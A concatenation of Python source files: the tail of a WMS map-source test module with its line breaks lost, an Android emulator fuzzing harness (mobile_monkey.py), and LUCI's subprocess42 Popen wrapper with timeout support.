self.requested = [] def open(self, url, data=None): self.requested.append(url) w = int(re.search(r'width=(\d+)', url, re.IGNORECASE).group(1)) h = int(re.search(r'height=(\d+)', url, re.IGNORECASE).group(1)) format = re.search(r'format=image(/|%2F)(\w+)', url, re.IGNORECASE).group(2) transparent = re.search(r'transparent=(\w+)', url, re.IGNORECASE) transparent = True if transparent and transparent.group(1).lower() == 'true' else False result = BytesIO() create_debug_img((int(w), int(h)), transparent).save(result, format=format) result.seek(0) result.headers = {'Content-type': 'image/'+format} return result @pytest.fixture def mock_http_client(): return MockHTTPClient() class TestWMSSourceTransform(object): @pytest.fixture def source(self, mock_http_client): req_template = WMS111MapRequest(url='http://localhost/service?', param={ 'format': 'image/png', 'layers': 'foo' }) client = WMSClient(req_template, http_client=mock_http_client) return WMSSource(client, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) def test_get_map(self, source, mock_http_client): source.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326))) assert query_eq(mock_http_client.requested[0], "http://localhost/service?" "layers=foo&width=300&version=1.1.1&bbox=-180,-90,180,90&service=WMS" "&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=150") def test_get_map_transformed(self, source, mock_http_client): source.get_map(MapQuery( (556597, 4865942, 1669792, 7361866), (300, 150), SRS(900913))) assert wms_query_eq(mock_http_client.requested[0], "http://localhost/service?" "layers=foo&width=300&version=1.1.1" "&bbox=4.99999592195,39.9999980766,14.999996749,54.9999994175&service=WMS" "&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=450") class TestWMSSourceWithClient(object): @pytest.fixture def req_template(self): return WMS111MapRequest( url='http://%s:%d/service?' 
% TEST_SERVER_ADDRESS, param={'format': 'image/png', 'layers': 'foo'}, ) @pytest.fixture def client(self, req_template): return WMSClient(req_template) @pytest.fixture def source(self, client): return WMSSource(client) def test_get_map(self, source): with tmp_image((512, 512)) as img: expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles=' '&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'}, {'body': img.read(), 'headers': {'content-type': 'image/png'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) result = source.get_map(q) assert isinstance(result, ImageSource) assert result.size == (512, 512) assert is_png(result.as_buffer(seekable=True)) assert result.as_image().size == (512, 512) def test_get_map_non_image_content_type(self, source): with tmp_image((512, 512)) as img: expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles=' '&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'}, {'body': img.read(), 'headers': {'content-type': 'text/plain'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) try: source.get_map(q) except SourceError as e: assert 'no image returned' in e.args[0] else: assert False, 'no SourceError raised' def test_basic_auth(self, req_template, client, source): http_client = HTTPClient(req_template.url, username='foo', password='bar@') client.http_client = http_client def assert_auth(req_handler): assert 'Authorization' in req_handler.headers auth_data = req_handler.headers['Authorization'].split()[1] auth_data = base64.b64decode(auth_data.encode('utf-8')).decode('utf-8') assert auth_data == 'foo:bar@' return True expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' 
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512&STYLES=', 'require_basic_auth': True, 'req_assert_function': assert_auth}, {'body': b'no image', 'headers': {'content-type': 'image/png'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) source.get_map(q) TESTSERVER_URL = 'http://%s:%d' % TEST_SERVER_ADDRESS class TestWMSSource(object): @pytest.fixture def source(self, mock_http_client): req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo'}) wms = WMSClient(req, http_client=mock_http_client) return WMSSource(wms, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) def test_request(self, source, mock_http_client): req = MapQuery((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326), 'png') source.get_map(req) assert len(mock_http_client.requested) == 1 assert_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=256&SRS=EPSG%3A4326' '&VERSION=1.1.1&BBOX=-180.0,-90.0,180.0,90.0&WIDTH=512&STYLES=') def test_transformed_request(self, source, mock_http_client): req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png') resp = source.get_map(req) assert len(mock_http_client.requested) == 1 assert wms_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' '&VERSION=1.1.1&WIDTH=512&STYLES=' '&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121') img = resp.as_image() assert img.mode in ('P', 'RGB') def test_similar_srs(self, mock_http_client): # request in 3857 and source supports only 900913 # 3857 and 900913 are equal but the client requests must use 900913 req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo', 'transparent': 'true'}) wms = WMSClient(req, http_client=mock_http_client) source = 
WMSSource(wms, supported_srs=[SRS(900913)], image_opts=ImageOptions(resampling='bilinear')) req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(3857), 'png') source.get_map(req) assert len(mock_http_client.requested) == 1 assert_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A900913' '&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true' '&BBOX=-200000,-200000,200000,200000') def test_transformed_request_transparent(self, mock_http_client): req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo', 'transparent': 'true'}) wms = WMSClient(req, http_client=mock_http_client) source = WMSSource(wms, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png') resp = source.get_map(req) assert len(mock_http_client.requested) == 1 assert wms_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' '&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true' '&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121') img = resp.as_image() assert img.mode in ('P', 'RGBA') img = img.convert('RGBA') assert img.getpixel((5, 5))[3] == 0 class MockLayer(object): def __init__(self): self.requested = [] def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) @pytest.mark.parametrize('case,map_query,low_requested', [ ['low', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(3857)), True], ['high', MapQuery((0, 0, 100, 100), (100, 100), SRS(3857)), False], ['match', MapQuery((0, 0, 10, 10), (100, 100), SRS(3857)), False], ['low_transform', MapQuery((0, 0, 0.1, 0.1), (100, 100), SRS(4326)), True], ['high_transform', MapQuery((0, 0, 0.005, 0.005), (100, 100), SRS(4326)), False], ]) def 
test_resolution_conditional_layers(case, map_query, low_requested): low = MockLayer() high = MockLayer() layer = ResolutionConditional(low, high, 10, SRS(3857), GLOBAL_GEOGRAPHIC_EXTENT) layer.get_map(map_query) assert bool(low.requested) == low_requested assert bool(high.requested) != low_requested def test_srs_conditional_layers(): l4326 = MockLayer() l900913 = MockLayer() l32632 = MockLayer() layer = SRSConditional([ (l4326, (SRS('EPSG:4326'),)), (l900913, (SRS('EPSG:900913'), SRS('EPSG:31467'))), (l32632, (SRSConditional.PROJECTED,)), ], GLOBAL_GEOGRAPHIC_EXTENT) # srs match assert layer._select_layer(SRS(4326)) == l4326 assert layer._select_layer(SRS(900913)) == l900913 assert layer._select_layer(SRS(31467)) == l900913 # type match (projected) assert layer._select_layer(SRS(31466)) == l32632 assert layer._select_layer(SRS(32633)) == l32632 # fallback is first layer assert layer._select_layer(SRS(4258)) == l4326 @pytest.mark.parametrize('case,map_query,is_direct,is_l3857,is_l4326', [ ['high_3857', MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)), True, False, False], ['high_4326', MapQuery((0, 0, 0.0001, 0.0001), (100, 100), SRS(4326)), True, False, False], ['low_4326', MapQuery((0, 0, 10, 10), (100, 100), SRS(4326)), False, False, True], ['low_3857', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)), False, True, False], ['low_projected', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)), False, True, False], ]) def test_neasted_conditional_layers(case, map_query, is_direct, is_l3857, is_l4326): direct = MockLayer() l3857 = MockLayer() l4326 = MockLayer() layer = ResolutionConditional( SRSConditional([ (l3857, (SRS('EPSG:3857'),)), (l4326, (SRS('EPSG:4326'),)) ], GLOBAL_GEOGRAPHIC_EXTENT), direct, 10, SRS(3857), GLOBAL_GEOGRAPHIC_EXTENT ) layer.get_map(map_query) assert bool(direct.requested) == is_direct assert bool(l3857.requested) == is_l3857 assert bool(l4326.requested) == is_l4326
mobile_monkey.py
''' mobile monkey '''
import time
from typing import List
from threading import Thread

import config_reader as config
import emulator_manager
import api_commands
from telnet_connector import TelnetAdb
from telnet_connector import GsmProfile
from telnet_connector import NetworkDelay
from telnet_connector import NetworkStatus
from emulator import Emulator
from fuzz_context import Fuzzer
from adb_settings import Airplane, KeyboardEvent, UserRotation
import util
from adb_monkey import AdbMonkey
from apk import Apk
from adb_logcat import Logcat, TestType, FatalWatcher
from log_analyzer import Analyzer

# Global toggles for debug / timing output.
PRINT_FLAG = True
TIME_PRINT_FLAG = True

emulator_model = config.EMULATOR_NAME
emulator_port = config.EMULATOR_PORT

# Total number of contextual events scheduled across all fuzzing threads.
# Updated by threads_to_run() and reported by run().
contextual_events = 0
WILL_MONKEY = True


def start_emulator() -> bool:
    '''Start the configured emulator AVD unless one is already running.

    Returns:
        True once an adb-visible emulator instance has finished booting.
    '''
    if emulator_manager.adb_instances_manager():
        util.debug_print('already emulators are running.', flag=PRINT_FLAG)
        return True
    util.debug_print(
        str.format("No emulator instance running. starting {} at port {}",
                   emulator_model, emulator_port),
        flag=PRINT_FLAG)
    api_commands.adb_start_server_safe()
    emulator_manager.emulator_start_avd(emulator_port, emulator_model)
    # Block until the AVD reports a complete boot.
    emulator_manager.check_avd_booted_completely(emulator_port)
    return True


def threads_to_run(emulator: Emulator, apk: Apk, fuzz: Fuzzer,
                   will_monkey: bool) -> List:
    '''Build the list of fuzzing threads appropriate for the given APK.

    Network-related event threads (delay, speed, airplane mode, GSM profile)
    are only scheduled when the APK requests the corresponding Android
    permissions.  Rotation and keyboard events are always scheduled.  An
    AdbMonkey thread is appended when will_monkey is True.

    Side effect: increments the module-level contextual_events counter by
    the number of generated events.

    Returns:
        A list of unstarted threading.Thread objects.
    '''
    global contextual_events
    threads = []
    util.debug_print(apk.permissions, flag=PRINT_FLAG)
    emulator_name = 'emulator-' + emulator.port

    if "android.permission.INTERNET" in apk.permissions or \
            "android.permission.ACCESS_NETWORK_STATE" in apk.permissions:
        util.debug_print("Internet permission detected", flag=PRINT_FLAG)

        network_delay_interval_events = fuzz.generate_step_interval_event(
            NetworkDelay)
        contextual_events += len(network_delay_interval_events)
        threads.append(Thread(target=fuzz.random_network_delay, args=(
            config.LOCALHOST, emulator, network_delay_interval_events)))

        network_speed_interval_event = fuzz.generate_step_interval_event(
            NetworkStatus)
        contextual_events += len(network_speed_interval_event)
        threads.append(Thread(target=fuzz.random_network_speed, args=(
            config.LOCALHOST, emulator, network_speed_interval_event)))

        airplane_mode_interval_events = fuzz.generate_step_interval_event(
            Airplane)
        contextual_events += len(airplane_mode_interval_events)
        threads.append(Thread(
            target=fuzz.random_airplane_mode_call,
            args=(emulator_name, airplane_mode_interval_events)))

    if "android.permission.ACCESS_NETWORK_STATE" in apk.permissions:
        util.debug_print("access_network_state detected", flag=PRINT_FLAG)
        gsm_profile_interval_events = fuzz.generate_step_uniforminterval_event(
            GsmProfile)
        contextual_events += len(gsm_profile_interval_events)
        threads.append(Thread(target=fuzz.random_gsm_profile, args=(
            config.LOCALHOST, emulator, config.UNIFORM_INTERVAL,
            gsm_profile_interval_events)))

    user_rotation_interval_events = fuzz.generate_step_interval_event(
        UserRotation)
    contextual_events += len(user_rotation_interval_events)
    threads.append(Thread(
        target=fuzz.random_rotation,
        args=(emulator_name, user_rotation_interval_events)))

    key_event_interval_events = fuzz.generate_step_interval_event(
        KeyboardEvent)
    contextual_events += len(key_event_interval_events)
    threads.append(Thread(
        target=fuzz.random_key_event,
        args=(emulator_name, key_event_interval_events)))

    if will_monkey:
        monkey = AdbMonkey(emulator, apk, config.SEED, config.DURATION)
        threads.append(Thread(target=monkey.start_monkey))

    return threads


def run(apk: Apk, emulator_name: str, emulator_port: int):
    '''Boot the emulator, fuzz the given APK, and report the results.

    NOTE(review): emulator_port is currently unused here; the port is taken
    from the emulator instance looked up by name.  Kept for interface
    compatibility.
    '''
    # Local run-mode switches (kept from the original script).
    to_kill = False
    to_test = True
    to_full_run = True
    wipe_after_finish = False

    if not start_emulator():
        return
    emulator = emulator_manager.get_adb_instance_from_emulators(emulator_name)
    telnet_connector = TelnetAdb(config.LOCALHOST, emulator.port)
    log = Logcat(emulator, apk, TestType.MobileMonkey)

    if to_kill:
        # Was quit(): returning is cleaner than killing the interpreter.
        telnet_connector.kill_avd()
        return
    if not to_test:
        return

    log.start_logcat()
    fuzz = Fuzzer(config.MINIMUM_INTERVAL, config.MAXIMUM_INTERVAL,
                  config.SEED, config.DURATION,
                  FatalWatcher(log.file_address))
    threads = threads_to_run(emulator, apk, fuzz, WILL_MONKEY)
    global contextual_events
    print("Total contextual events: " + str(contextual_events))

    if to_full_run:
        util.debug_print(
            "started testing at {}".format(time.ctime()),
            flag=TIME_PRINT_FLAG)
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

    api_commands.adb_stop_activity_of_apk(emulator, apk)
    log.stop_logcat()
    api_commands.adb_uninstall_apk(emulator, apk)
    util.debug_print(
        'Finished testing and uninstalling app at {}'.format(time.ctime()),
        flag=TIME_PRINT_FLAG)
    print(Analyzer(log.file_address))
    if wipe_after_finish:
        print("successfully completed testing app. Closing emulator")
        telnet_connector.kill_avd()
        emulator_manager.emulator_wipe_data(emulator)


if __name__ == '__main__':
    run(Apk(config.APK_FULL_PATH), config.EMULATOR_NAME, config.EMULATOR_PORT)
subprocess42.py
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.

"""subprocess42 is the answer to life the universe and everything.

It has the particularity of having a Popen implementation that can yield output
as it is produced while implementing a timeout and NOT requiring the use of
worker threads.

NOTE(review): this module is Python 2 only - it relies on
subprocess.mswindows, subprocess._subprocess / _eintr_retry_call and
dict.iteritems(), none of which exist on Python 3.

Example:
  Wait for a child process with a timeout, send SIGTERM, wait a grace period
  then send SIGKILL:

    def wait_terminate_then_kill(proc, timeout, grace):
      try:
        return proc.wait(timeout)
      except subprocess42.TimeoutExpired:
        proc.terminate()
        try:
          return proc.wait(grace)
        except subprocess42.TimeoutExpired:
          proc.kill()
        return proc.wait()

TODO(maruel): Add VOID support like subprocess2.
"""

import collections
import contextlib
import errno
import os
import signal
import sys
import threading
import time

import subprocess

from subprocess import CalledProcessError, PIPE, STDOUT  # pylint: disable=W0611
from subprocess import list2cmdline


# Default maxsize argument.
MAX_SIZE = 16384


# Set to True when inhibit_crash_dump() has been called.
_OS_ERROR_REPORTING_INHIBITED = False


if subprocess.mswindows:
  import ctypes
  import msvcrt  # pylint: disable=F0401
  from ctypes import wintypes
  from ctypes import windll

  # Which to be received depends on how this process was called and outside the
  # control of this script. See Popen docstring for more details.
  STOP_SIGNALS = (signal.SIGBREAK, signal.SIGTERM)

  def ReadFile(handle, desired_bytes):
    """Calls kernel32.ReadFile().

    Returns (last_error, data) where data is at most desired_bytes long.
    """
    c_read = wintypes.DWORD()
    buff = wintypes.create_string_buffer(desired_bytes+1)
    windll.kernel32.ReadFile(
        handle, buff, desired_bytes, wintypes.byref(c_read), None)
    # NULL terminate it.
    buff[c_read.value] = '\x00'
    return wintypes.GetLastError(), buff.value

  def PeekNamedPipe(handle):
    """Calls kernel32.PeekNamedPipe(). Simplified version.

    Returns the number of bytes available to read without blocking.
    Raises OSError if the pipe is broken/closed.
    """
    c_avail = wintypes.DWORD()
    c_message = wintypes.DWORD()
    success = windll.kernel32.PeekNamedPipe(
        handle, None, 0, None, wintypes.byref(c_avail),
        wintypes.byref(c_message))
    if not success:
      raise OSError(wintypes.GetLastError())
    return c_avail.value

  def recv_multi_impl(conns, maxsize, timeout):
    """Reads from the first available pipe.

    It will immediately return on a closed connection, independent of timeout.

    Arguments:
    - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE.
    - timeout: If None, it is blocking. If 0 or above, will return None if no
          data is available within |timeout| seconds.

    Returns:
      tuple(int(index), str(data), bool(closed)).
    """
    assert conns
    assert timeout is None or isinstance(timeout, (int, float)), timeout
    maxsize = max(maxsize or MAX_SIZE, 1)

    # TODO(maruel): Use WaitForMultipleObjects(). Python creates anonymous pipes
    # for proc.stdout and proc.stderr but they are implemented as named pipes on
    # Windows. Since named pipes are not waitable object, they can't be passed
    # as-is to WFMO(). So this means N times CreateEvent(), N times ReadFile()
    # and finally WFMO(). This requires caching the events handles in the Popen
    # object and remembering the pending ReadFile() calls. This will require
    # some re-architecture to store the relevant event handle and OVERLAPPEDIO
    # object in Popen or the file object.
    start = time.time()
    handles = [
      (i, msvcrt.get_osfhandle(c.fileno())) for i, c in enumerate(conns)
    ]
    while True:
      for index, handle in handles:
        try:
          avail = min(PeekNamedPipe(handle), maxsize)
          if avail:
            return index, ReadFile(handle, avail)[1], False
        except OSError:
          # The pipe closed.
          return index, None, True

      if timeout is not None and (time.time() - start) >= timeout:
        return None, None, False
      # Polling rocks.
      time.sleep(0.001)

else:
  import fcntl  # pylint: disable=F0401
  import select

  # Signals that mean this process should exit quickly.
  STOP_SIGNALS = (signal.SIGINT, signal.SIGTERM)

  def recv_multi_impl(conns, maxsize, timeout):
    """Reads from the first available pipe.

    It will immediately return on a closed connection, independent of timeout.

    Arguments:
    - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE.
    - timeout: If None, it is blocking. If 0 or above, will return None if no
          data is available within |timeout| seconds.

    Returns:
      tuple(int(index), str(data), bool(closed)).
    """
    assert conns
    assert timeout is None or isinstance(timeout, (int, float)), timeout
    maxsize = max(maxsize or MAX_SIZE, 1)

    # select(timeout=0) will block, it has to be a value > 0.
    if timeout == 0:
      timeout = 0.001
    try:
      r, _, _ = select.select(conns, [], [], timeout)
    except select.error:
      r = None
    if not r:
      return None, None, False

    conn = r[0]
    # Temporarily make it non-blocking.
    # TODO(maruel): This is not very efficient when the caller is doing this in
    # a loop. Add a mechanism to have the caller handle this.
    flags = fcntl.fcntl(conn, fcntl.F_GETFL)
    if not conn.closed:
      # pylint: disable=E1101
      fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)
    try:
      try:
        data = conn.read(maxsize)
      except IOError as e:
        # On posix, this means the read would block.
        if e.errno == errno.EAGAIN:
          return conns.index(conn), None, False
        raise e

      if not data:
        # On posix, this means the channel closed.
        return conns.index(conn), None, True

      return conns.index(conn), data, False
    finally:
      # Restore the original blocking mode.
      if not conn.closed:
        fcntl.fcntl(conn, fcntl.F_SETFL, flags)


class TimeoutExpired(Exception):
  """Compatible with python3 subprocess."""
  def __init__(self, cmd, timeout, output=None, stderr=None):
    self.cmd = cmd
    self.timeout = timeout
    self.output = output
    # Non-standard:
    self.stderr = stderr
    super(TimeoutExpired, self).__init__(str(self))

  def __str__(self):
    return "Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)


class Popen(subprocess.Popen):
  """Adds timeout support on stdout and stderr.

  Inspired by
  http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/

  Unlike subprocess, yield_any(), recv_*(), communicate() will close stdout and
  stderr once the child process closes them, after all the data is read.

  Arguments:
  - detached: If True, the process is created in a new process group. On
    Windows, use CREATE_NEW_PROCESS_GROUP. On posix, use os.setpgid(0, 0).

  Additional members:
  - start: timestamp when this process started.
  - end: timestamp when this process exited, as seen by this process.
  - detached: If True, the child process was started as a detached process.
  - gid: process group id, if any.
  - duration: time in seconds the process lasted.

  Additional methods:
  - yield_any(): yields output until the process terminates.
  - recv_any(): reads from stdout and/or stderr with optional timeout.
  - recv_out() & recv_err(): specialized version of recv_any().
  """
  # subprocess.Popen.__init__() is not threadsafe; there is a race between
  # creating the exec-error pipe for the child and setting it to CLOEXEC during
  # which another thread can fork and cause the pipe to be inherited by its
  # descendents, which will cause the current Popen to hang until all those
  # descendents exit. Protect this with a lock so that only one fork/exec can
  # happen at a time.
  popen_lock = threading.Lock()

  def __init__(self, args, **kwargs):
    # These two are reserved: detached=True drives them instead.
    assert 'creationflags' not in kwargs
    assert 'preexec_fn' not in kwargs, 'Use detached=True instead'
    self.start = time.time()
    self.end = None
    self.gid = None
    self.detached = kwargs.pop('detached', False)
    if self.detached:
      if subprocess.mswindows:
        kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
      else:
        kwargs['preexec_fn'] = lambda: os.setpgid(0, 0)
    with self.popen_lock:
      super(Popen, self).__init__(args, **kwargs)
    self.args = args
    if self.detached and not subprocess.mswindows:
      try:
        self.gid = os.getpgid(self.pid)
      except OSError:
        # sometimes the process can run+finish before we collect its pgid. fun.
        pass

  def duration(self):
    """Duration of the child process.

    It is greater or equal to the actual time the child process ran. It can be
    significantly higher than the real value if neither .wait() nor .poll() was
    used.
    """
    return (self.end or time.time()) - self.start

  # pylint: disable=arguments-differ,redefined-builtin
  def communicate(self, input=None, timeout=None):
    """Implements python3's timeout support.

    Unlike wait(), timeout=0 is considered the same as None.

    Raises:
    - TimeoutExpired when more than timeout seconds were spent waiting for the
      process.
    """
    if not timeout:
      return super(Popen, self).communicate(input=input)

    assert isinstance(timeout, (int, float)), timeout

    if self.stdin or self.stdout or self.stderr:
      stdout = '' if self.stdout else None
      stderr = '' if self.stderr else None
      t = None
      if input is not None:
        assert self.stdin, (
            'Can\'t use communicate(input) if not using '
            'Popen(stdin=subprocess42.PIPE')
        # TODO(maruel): Switch back to non-threading.
        def write():
          try:
            self.stdin.write(input)
          except IOError:
            pass
        t = threading.Thread(name='Popen.communicate', target=write)
        t.daemon = True
        t.start()

      try:
        if self.stdout or self.stderr:
          # Deadline shared by all yield_any() iterations below.
          start = time.time()
          end = start + timeout
          def remaining():
            return max(end - time.time(), 0)
          for pipe, data in self.yield_any(timeout=remaining):
            if pipe is None:
              # yield_any() timed out; surface partial output in the exception.
              raise TimeoutExpired(self.args, timeout, stdout, stderr)
            assert pipe in ('stdout', 'stderr'), pipe
            if pipe == 'stdout':
              stdout += data
            else:
              stderr += data
        else:
          # Only stdin is piped.
          self.wait(timeout=timeout)
      finally:
        if t:
          try:
            self.stdin.close()
          except IOError:
            pass
          t.join()
    else:
      # No pipe. The user wanted to use wait().
      self.wait(timeout=timeout)
      return None, None

    # Indirectly initialize self.end.
    self.wait()
    return stdout, stderr

  def wait(self, timeout=None):  # pylint: disable=arguments-differ
    """Implements python3's timeout support.

    Raises:
    - TimeoutExpired when more than timeout seconds were spent waiting for the
      process.
    """
    assert timeout is None or isinstance(timeout, (int, float)), timeout
    if timeout is None:
      super(Popen, self).wait()
    elif self.returncode is None:
      if subprocess.mswindows:
        WAIT_TIMEOUT = 258
        result = subprocess._subprocess.WaitForSingleObject(
            self._handle, int(timeout * 1000))
        if result == WAIT_TIMEOUT:
          raise TimeoutExpired(self.args, timeout)
        self.returncode = subprocess._subprocess.GetExitCodeProcess(
            self._handle)
      else:
        # If you think the following code is horrible, it's because it is
        # inspired by python3's stdlib.
        end = time.time() + timeout
        delay = 0.001
        while True:
          try:
            pid, sts = subprocess._eintr_retry_call(
                os.waitpid, self.pid, os.WNOHANG)
          except OSError as e:
            if e.errno != errno.ECHILD:
              raise
            # No child process: treat as already reaped with status 0.
            pid = self.pid
            sts = 0
          if pid == self.pid:
            # This sets self.returncode.
            self._handle_exitstatus(sts)
            break
          remaining = end - time.time()
          if remaining <= 0:
            raise TimeoutExpired(self.args, timeout)
          # Exponential backoff capped at 50ms.
          delay = min(delay * 2, remaining, .05)
          time.sleep(delay)

    if not self.end:
      # communicate() uses wait() internally.
      self.end = time.time()
    return self.returncode

  def poll(self):
    # Record the exit timestamp the first time the process is seen dead.
    ret = super(Popen, self).poll()
    if ret is not None and not self.end:
      self.end = time.time()
    return ret

  def yield_any_line(self, **kwargs):
    """Yields lines until the process terminates.

    Like yield_any, but yields lines.
    """
    return split(self.yield_any(**kwargs))

  def yield_any(self, maxsize=None, timeout=None):
    """Yields output until the process terminates.

    Unlike wait(), does not raise TimeoutExpired.

    Yields:
      (pipename, data) where pipename is either 'stdout', 'stderr' or None in
      case of timeout or when the child process closed one of the pipe(s) and
      all pending data on the pipe was read.

    Arguments:
    - maxsize: See recv_any(). Can be a callable function.
    - timeout: If None, the call is blocking. If set, yields None, None if no
          data is available within |timeout| seconds. It resets itself after
          each yield. Can be a callable function.
    """
    assert self.stdout or self.stderr
    if timeout is not None:
      # timeout=0 effectively means that the pipe is continuously polled.
      if isinstance(timeout, (int, float)):
        assert timeout >= 0, timeout
        # Normalize a numeric timeout into a callable.
        old_timeout = timeout
        timeout = lambda: old_timeout
      else:
        assert callable(timeout), timeout

    if maxsize is not None and not callable(maxsize):
      assert isinstance(maxsize, (int, float)), maxsize

    last_yield = time.time()
    while self.poll() is None:
      to = timeout() if timeout else None
      if to is not None:
        to = max(to - (time.time() - last_yield), 0)
      t, data = self.recv_any(
          maxsize=maxsize() if callable(maxsize) else maxsize, timeout=to)
      # NOTE(review): 'to is 0' is an identity check against the int literal 0;
      # it only matches because max(..., 0) returns the cached small int on
      # CPython 2 and never matches when 'to' is a float. 'to == 0' looks like
      # the intent - confirm before changing, as it alters how often the
      # (None, None) timeout sentinel is yielded.
      if data or to is 0:
        yield t, data
        last_yield = time.time()

    # Read all remaining output in the pipes.
    # There is 3 cases:
    # - pipes get closed automatically by the calling process before it exits
    # - pipes are closed automated by the OS
    # - pipes are kept open due to grand-children processes outliving the
    #   children process.
    while True:
      ms = maxsize
      if callable(maxsize):
        ms = maxsize()
      # timeout=0 is mainly to handle the case where a grand-children process
      # outlives the process started.
      t, data = self.recv_any(maxsize=ms, timeout=0)
      if not data:
        break
      yield t, data

  def recv_any(self, maxsize=None, timeout=None):
    """Reads from the first pipe available from stdout and stderr.

    Unlike wait(), does not throw TimeoutExpired.

    Arguments:
    - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE.
    - timeout: If None, it is blocking. If 0 or above, will return None if no
          data is available within |timeout| seconds.

    Returns:
      tuple(pipename or None, str(data)). pipename is one of 'stdout' or
      'stderr'.
    """
    # recv_multi_impl will early exit on a closed connection. Loop accordingly
    # to simplify call sites.
    while True:
      pipes = [
        x for x in ((self.stderr, 'stderr'), (self.stdout, 'stdout')) if x[0]
      ]
      # If both stdout and stderr have the exact file handle, they are
      # effectively the same pipe. Deduplicate it since otherwise it confuses
      # recv_multi_impl().
      if len(pipes) == 2 and self.stderr.fileno() == self.stdout.fileno():
        pipes.pop(0)

      if not pipes:
        return None, None
      start = time.time()
      conns, names = zip(*pipes)
      index, data, closed = recv_multi_impl(conns, maxsize, timeout)
      if index is None:
        # Timed out with no data.
        return index, data
      if closed:
        self._close(names[index])
        if not data:
          # Loop again. The other pipe may still be open.
          if timeout:
            # Shrink the timeout by the time already spent.
            timeout -= (time.time() - start)
          continue

      if self.universal_newlines and data:
        data = self._translate_newlines(data)
      return names[index], data

  def recv_out(self, maxsize=None, timeout=None):
    """Reads from stdout synchronously with timeout."""
    return self._recv('stdout', maxsize, timeout)

  def recv_err(self, maxsize=None, timeout=None):
    """Reads from stderr synchronously with timeout."""
    return self._recv('stderr', maxsize, timeout)

  def terminate(self):
    """Tries to do something saner on Windows that the stdlib.

    Windows:
      self.detached/CREATE_NEW_PROCESS_GROUP determines what can be used:
      - If set, only SIGBREAK can be sent and it is sent to a single process.
      - If not set, in theory only SIGINT can be used and *all processes* in
         the processgroup receive it. In practice, we just kill the process.
      See http://msdn.microsoft.com/library/windows/desktop/ms683155.aspx
      The default on Windows is to call TerminateProcess() always, which is not
      useful.

    On Posix, always send SIGTERM.
    """
    try:
      if subprocess.mswindows and self.detached:
        return self.send_signal(signal.CTRL_BREAK_EVENT)
      super(Popen, self).terminate()
    except OSError:
      # The function will throw if the process terminated in-between. Swallow
      # this.
      pass

  def kill(self):
    """Kills the process and its children if possible.

    Swallows exceptions and return True on success.
    """
    if self.gid:
      # Detached on posix: kill the whole process group.
      try:
        os.killpg(self.gid, signal.SIGKILL)
      except OSError:
        return False
    else:
      try:
        super(Popen, self).kill()
      except OSError:
        return False
    return True

  def _close(self, which):
    """Closes either stdout or stderr."""
    getattr(self, which).close()
    setattr(self, which, None)

